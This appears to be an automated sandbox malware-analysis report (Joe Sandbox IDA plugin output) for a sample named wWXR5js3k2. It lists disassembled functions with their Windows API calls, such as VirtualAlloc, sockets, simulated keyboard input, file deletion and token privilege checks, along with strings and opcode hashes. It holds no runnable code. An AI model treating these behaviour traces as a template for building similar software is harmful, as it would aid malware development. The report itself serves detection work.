                                                    Strings
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: @U=u$edit
                                                    • API String ID: 2978978980-590756393
                                                    • Opcode ID: b1e969a331284a707e4dfec6e046bb29700fd2b1325fa65860e63e471207d262
                                                    • Instruction ID: 5fd9b023ca316a4249afa09cd0ef327a6759287b58bd30a5ecfc0e57dfdb457a
                                                    • Opcode Fuzzy Hash: b1e969a331284a707e4dfec6e046bb29700fd2b1325fa65860e63e471207d262
                                                    • Instruction Fuzzy Hash: 52119D71900109ABEB108F64DC50AEB376AEB05374F504726F9A59A3E0C731DC519760
                                                    APIs
                                                    • SendMessageW.USER32(?,?,?,?), ref: 006D8530
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 3850602802-4076565667
                                                    • Opcode ID: 1796a525cd72ca4b77d621811496d92f7e922448ee9a49a94b3cc376ef6b49f5
                                                    • Instruction ID: 2f8540f2ec66b39dbf799d7b2aa9db7cc723828bd9bbfc95a5da5ad1b9b36736
                                                    • Opcode Fuzzy Hash: 1796a525cd72ca4b77d621811496d92f7e922448ee9a49a94b3cc376ef6b49f5
                                                    • Instruction Fuzzy Hash: D421B775A0020AEFCB55DF98D845CEA7BB6FB4D350B008199FD06A7360DA31ED61DB90
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C14,007152F8,?,?,?), ref: 0066096E
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _wcscat.LIBCMT ref: 00694CB7
                                                    Strings
Similarity
• API ID: FullNamePath_memmove_wcscat
• String ID: p*$Sq
• API String ID: 257928180-1855700939
• Opcode ID: 16b757c3a7d354d10a60b43ceabac5757bdb0eb5751eefffe469ce7d28a0567c
• Instruction ID: 0591fa55da7321ef42a19693ff1751a97a25ad6eaeb275c2fc94cb46f4c8abea
• Opcode Fuzzy Hash: 16b757c3a7d354d10a60b43ceabac5757bdb0eb5751eefffe469ce7d28a0567c
• Instruction Fuzzy Hash: B811A5309052099B9B84FB64D805EDE73BBEF08355F0055BAF959D7281EAB097884714
APIs
  • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
  • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006A8E73
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
• API String ID: 372448540-2258501812
• Opcode ID: e0482e4cdbde187eaf4f3ebe4bd87aaee1953149801f8311fbe078625f1ce5e5
• Instruction ID: bd5632f11881bdee93cb34ef10b16f59cef8c6feade0f0512178e3dc5c0736fd
• Opcode Fuzzy Hash: e0482e4cdbde187eaf4f3ebe4bd87aaee1953149801f8311fbe078625f1ce5e5
• Instruction Fuzzy Hash: AB019EB1A01219EBCB14BBA4CC558FE77AABF06320F144A1ABC22572E1DE365C0CCA50
APIs
  • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
  • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 006A8D6B
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
• API String ID: 372448540-2258501812
• Opcode ID: 855b9b3dc684a7e9301a7071bb2465fe9cb6dc2ab554b1af278cd8be7997bd28
• Instruction ID: bfea7bdda8899dbcf37a840a868b628c2086b26670f32dc83e09d82503390256
• Opcode Fuzzy Hash: 855b9b3dc684a7e9301a7071bb2465fe9cb6dc2ab554b1af278cd8be7997bd28
• Instruction Fuzzy Hash: 1501F2B1A41109ABCB14FBE0C956EFEB3AADF16300F10412EBC02672E1DE255E0CDA75
APIs
  • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
  • Part of subcall function 006AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006AAABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 006A8DEE
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: @U=u$ComboBox$ListBox
• API String ID: 372448540-2258501812
• Opcode ID: 086a3fbe9db39a7edcb6ab986dbcb9c57280129137eab59d8d7255333dca990b
• Instruction ID: 7ce4a200f1ac9a10a06fe80ee7b66dfcc726fd4b87d9a1f214ea25873620fdf7
• Opcode Fuzzy Hash: 086a3fbe9db39a7edcb6ab986dbcb9c57280129137eab59d8d7255333dca990b
• Instruction Fuzzy Hash: 2801F7B1A41109ABCB14F7A4C956AFE77AA8F12300F10411ABC02672D2DE155E0CD675
APIs
  • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
• DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0068B93A,?,?,?), ref: 006DC5F1
  • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 006DC5D7
Similarity
• API ID: LongWindow$MessageProcSend
• String ID: @U=u$hW
• API String ID: 982171247-4076565667
• Opcode ID: 0619542d446a66e7a63c186c57cd1230e8803f151d4559d869ebf622a6d165ea
• Instruction ID: 607dc3b82ca3e0d76aadd8519962b76d893d9aea12025b80d55110ce97d66031
• Opcode Fuzzy Hash: 0619542d446a66e7a63c186c57cd1230e8803f151d4559d869ebf622a6d165ea
• Instruction Fuzzy Hash: 4401B531601209EFCB255F18EC54EAA3BA7FB85370F14452AF9511B3E0CB31A952DB50
Similarity
• API ID: __calloc_crt
• String ID: p$@Bq
• API String ID: 3494438863-221554537
• Opcode ID: 9a500c5f9e0186919670cef9017091fc60a6e1ac7297aed73ffb4e86fe61441d
• Instruction ID: 014c3aacf6b0450a426583a4fb6705b477c260fde9ab026f08c1bbdeb58fb4be
• Opcode Fuzzy Hash: 9a500c5f9e0186919670cef9017091fc60a6e1ac7297aed73ffb4e86fe61441d
• Instruction Fuzzy Hash: 69F044B2244E12CBE76C8F58FC51AD62796F781B30B60C52AF109CF2D0EB78885146D8
APIs
  • Part of subcall function 0066603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00666051
• SendMessageW.USER32(?,0000000C,00000000,?), ref: 0066607F
• GetParent.USER32(?), ref: 006A0D46
• InvalidateRect.USER32(00000000,?,00663A4F,?,00000000,00000001), ref: 006A0D4D
Similarity
• API ID: MessageSend$InvalidateParentRectTimeout
• String ID: @U=u
• API String ID: 3648793173-2594219639
• Opcode ID: ccbef7547462ded884948fe8cfa57825824dd7a1b13b3d613255ec2804d3a5a2
• Instruction ID: 3117717f12675e8f56f4991c06552c5e4420029dbdba0c8c6bd7748932b0f486
• Opcode Fuzzy Hash: ccbef7547462ded884948fe8cfa57825824dd7a1b13b3d613255ec2804d3a5a2
• Instruction Fuzzy Hash: FEF0E531500240FBFF202F70EC09FA57B5BAF06348F246439F5419A1B1C6B3AC41AB50
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00654B83,?), ref: 00654C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00654C56
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: cbcd041488d466807224a554d5ad34ddb02e54781602999a9b46cd8a9e28584a
• Instruction ID: 5999dada7165dd8d5a30a4f59c53c7f94a5319fdd8962f979b86ac5d4138dce1
• Opcode Fuzzy Hash: cbcd041488d466807224a554d5ad34ddb02e54781602999a9b46cd8a9e28584a
• Instruction Fuzzy Hash: F7D0C730901713CFC7208F31CC0868A73E6AF00346F21883B98A2C62A8EBB0C8C0CA10
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00654BD0,?,00654DEF,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00654C23
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: c83b708e8f2d444bc8d55fd60fdb734c634f1b70256575fc726b9e04ee9ea8f3
• Instruction ID: 65f220ca5d591e248e3364e941475f42b7229c5ee25d9c63c7a90c186263d7de
• Opcode Fuzzy Hash: c83b708e8f2d444bc8d55fd60fdb734c634f1b70256575fc726b9e04ee9ea8f3
• Instruction Fuzzy Hash: 2ED08230902713CFC720AB70CC08646BAE7AF09342B01983A9882C22A0EAB0C8808A10
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,006D1039), ref: 006D0DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006D0E07
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: b011c19086c7912b4767ab24ad3bb7adc3b756956f65de5b78b28c2214399542
• Instruction ID: 4fa01152f5f43e7052efb0252370e550586ce8b5132eb0ac6802dfd2a0e5d6c7
• Opcode Fuzzy Hash: b011c19086c7912b4767ab24ad3bb7adc3b756956f65de5b78b28c2214399542
• Instruction Fuzzy Hash: 6DD017B0910723CFE7209F76CC0878A77EAAF04352F159C3F9596D2291EBB4D8A0CA51
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,006C8CF4,?,006DF910), ref: 006C90EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006C9100
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 47d6dedc147fa9bc0f54aee34accafa1cf14414516fdba6ca84fadff5d965391
• Instruction ID: 6dfb0b4fd13f43322da412fc0167995502d490035d7beff164e59cdb98b1493c
• Opcode Fuzzy Hash: 47d6dedc147fa9bc0f54aee34accafa1cf14414516fdba6ca84fadff5d965391
• Instruction Fuzzy Hash: 41D01774910713CFDB209F31DC1DA5676E6AF05391B1A983F9496D6A90EB74D880CAA0
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: 7fdacb3f6b976a193e300d08036f42b095d7b5fd15dd2745add2e8cd287e6586
• Instruction ID: c3912404aa3b90cd2d3da349c4b769cb8060516ab12c90f6fdcc3a9f5511b717
• Opcode Fuzzy Hash: 7fdacb3f6b976a193e300d08036f42b095d7b5fd15dd2745add2e8cd287e6586
• Instruction Fuzzy Hash: 07D012B180511BEACF409BD098888B9737EA70A711F700553B506DA580E2258756E621
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
• Instruction ID: 52f339b77b7a2a960d59798756d76951793677371405b6a05ffba477d7dce1d7
• Opcode Fuzzy Hash: 5d6bc68faa4a1b67db2bceff7032deffc85d17dd7dc7f001b4e0a4f5ad4a404b
• Instruction Fuzzy Hash: D7C14875A04216EFCB14DFA4C884AAEBBF6FF49704B158598E805EB251D730EE81DF90
APIs
• CharLowerBuffW.USER32(?,?), ref: 006CE0BE
• CharLowerBuffW.USER32(?,?), ref: 006CE101
  • Part of subcall function 006CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CD7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006CE301
• _memmove.LIBCMT ref: 006CE314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: a1c1c46a274b469afd9d881bec58912772a98366b3af2ccbe028deeda0739c35
                                                    • Instruction ID: f884bc48f4fc6a5fc2cc7f100b572f8f4848de5af5f6f0b13923cab944a01984
                                                    • Opcode Fuzzy Hash: a1c1c46a274b469afd9d881bec58912772a98366b3af2ccbe028deeda0739c35
                                                    • Instruction Fuzzy Hash: 73C14771A08301DFC754DF28C480A6ABBE6FF89714F04896EF8999B351D731EA46CB91
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006C80C3
                                                    • CoUninitialize.OLE32 ref: 006C80CE
                                                      • Part of subcall function 006AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006AD5D4
                                                    • VariantInit.OLEAUT32(?), ref: 006C80D9
                                                    • VariantClear.OLEAUT32(?), ref: 006C83AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 5023322f7239eaa7080867a255aa63209dbc115a944171455115651d9130922b
                                                    • Instruction ID: d43b6c2a4d2ccff02449165e557bf5eb3e0ee84ccb7fada68881f61ce0d27d46
                                                    • Opcode Fuzzy Hash: 5023322f7239eaa7080867a255aa63209dbc115a944171455115651d9130922b
                                                    • Instruction Fuzzy Hash: 73A122356047019FCB50DF64C885B6AB7E6BF89314F08481DF99A9B3A2CB34ED05CB96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: dd1d7f8e97272fb586e21a1eabb9274fe1f43dbfde9b251aba038fb7fc8ec066
                                                    • Instruction ID: a196c0c931440d442a2859822cab3b71ad9443e35f30a48e084e45475e3dd88f
                                                    • Opcode Fuzzy Hash: dd1d7f8e97272fb586e21a1eabb9274fe1f43dbfde9b251aba038fb7fc8ec066
                                                    • Instruction Fuzzy Hash: F951C074600302DADB64BF65C891A6AB3E7AF56310F28D81FF686DB291DB34DC818F14
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 006C69D1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C69E1
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006C6A45
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006C6A51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: 09645205fc35e2651b91e18ddb0fa974b7d5b3e963ca0acba44b408deabedd36
                                                    • Instruction ID: ffffcac6d37cc7c5764fbb7f815f9c814a8cd8d6fceabc1b0a7f5c6e3c840a92
                                                    • Opcode Fuzzy Hash: 09645205fc35e2651b91e18ddb0fa974b7d5b3e963ca0acba44b408deabedd36
                                                    • Instruction Fuzzy Hash: F041A134640200AFEB90AF64CC86F7A77E6DF44B10F04851CFE59AF2D2DAB09D048B69
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,006DF910), ref: 006C64A7
                                                    • _strlen.LIBCMT ref: 006C64D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 4c8ea13d973ac400116e6ce0dad4a8f49ac81f6d67af88f8613217ceb30d4865
                                                    • Instruction ID: 914f2f3efdcf3e67adc4ceaae9cb8a817cbcea18fdfdab3a97259433c5b655cc
                                                    • Opcode Fuzzy Hash: 4c8ea13d973ac400116e6ce0dad4a8f49ac81f6d67af88f8613217ceb30d4865
                                                    • Instruction Fuzzy Hash: 04419371900104ABCB54EBA4DC95FBEB7ABEF04310F64815DF91A97292DB30ED05CB68
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006BB89E
                                                    • GetLastError.KERNEL32(?,00000000), ref: 006BB8C4
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006BB8E9
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006BB915
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 471059b4c9069970779f013c37b302e5911500f6c551422a6685a432cac1c26a
                                                    • Instruction ID: 6eb1f16eaf597592afea4681f68dc18173ec01c691911a8e58704dc6f94735f4
                                                    • Opcode Fuzzy Hash: 471059b4c9069970779f013c37b302e5911500f6c551422a6685a432cac1c26a
                                                    • Instruction Fuzzy Hash: 47412C35600910DFCB50EF25C484A9DBBE2EF4A310F198499EC4A9B362CB70FD45CBA5
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 006B0B27
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 006B0B43
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006B0BA9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 006B0BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
                                                    • Instruction ID: 4132a9aa4c51dad387650cc3e8648fb75a7ff999e1965869820b9c4b61f7bbcb
                                                    • Opcode Fuzzy Hash: 4d4106853f30434e56ea54a4d34deec56dbeef61385ef6e930350d196ac1d84b
                                                    • Instruction Fuzzy Hash: 773146B0D40208AEFB308B658C05BFBBFABAB55318F08425AE491522E1C3768DC19765
                                                    APIs
                                                    • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 006B0C66
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 006B0C82
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006B0CE1
                                                    • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 006B0D33
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
                                                    • Instruction ID: 0e9acf1f4e13d98cf6631b0079dff78280ce68112ef6f8c1ebad8d023dd1ec40
                                                    • Opcode Fuzzy Hash: f64b0b32b9fa81461e725c004354c291a5f9cd0d96e590b4ad68612ceec275cc
                                                    • Instruction Fuzzy Hash: 293103B0980218AEFF308B658815BFFBFA7AF49320F08431AE485522D1D7359DC587A6
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006861FB
                                                    • __isleadbyte_l.LIBCMT ref: 00686229
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00686257
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0068628D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 26a5407707d9bf93d3315fdaad10cbcfcfecc294af6e823cb33556f86a714e46
                                                    • Instruction ID: 60979e2d74236eb76920e964207e41db35a930eba499ddaf2e61f2ba35f7de60
                                                    • Opcode Fuzzy Hash: 26a5407707d9bf93d3315fdaad10cbcfcfecc294af6e823cb33556f86a714e46
                                                    • Instruction Fuzzy Hash: 1231D230600256EFDF21AF68CC48BAA7BBBFF41310F154269F86497291D731DA51D750
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 006D4F02
                                                      • Part of subcall function 006B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006B365B
                                                      • Part of subcall function 006B3641: GetCurrentThreadId.KERNEL32 ref: 006B3662
                                                      • Part of subcall function 006B3641: AttachThreadInput.USER32(00000000,?,006B5005), ref: 006B3669
                                                    • GetCaretPos.USER32(?), ref: 006D4F13
                                                    • ClientToScreen.USER32(00000000,?), ref: 006D4F4E
                                                    • GetForegroundWindow.USER32 ref: 006D4F54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 9b0afb92838e02be9f498704bb2ae7bfcc8e408dad1c1cc69ba0f798035cff48
                                                    • Instruction ID: 75fc0fc6b1f738208364f766f9f429f926d61f58d2bdc8b092e7406dd49271b9
                                                    • Opcode Fuzzy Hash: 9b0afb92838e02be9f498704bb2ae7bfcc8e408dad1c1cc69ba0f798035cff48
                                                    • Instruction Fuzzy Hash: 31311E71E00108AFDB40EFB5C8859EFB7FAEF98300F10446AE815E7251EA719E458BA4
                                                    APIs
                                                      • Part of subcall function 006A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8121
                                                      • Part of subcall function 006A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A812B
                                                      • Part of subcall function 006A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A813A
                                                      • Part of subcall function 006A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8141
                                                      • Part of subcall function 006A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8157
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006A86A3
                                                    • _memcmp.LIBCMT ref: 006A86C6
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006A86FC
                                                    • HeapFree.KERNEL32(00000000), ref: 006A8703
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
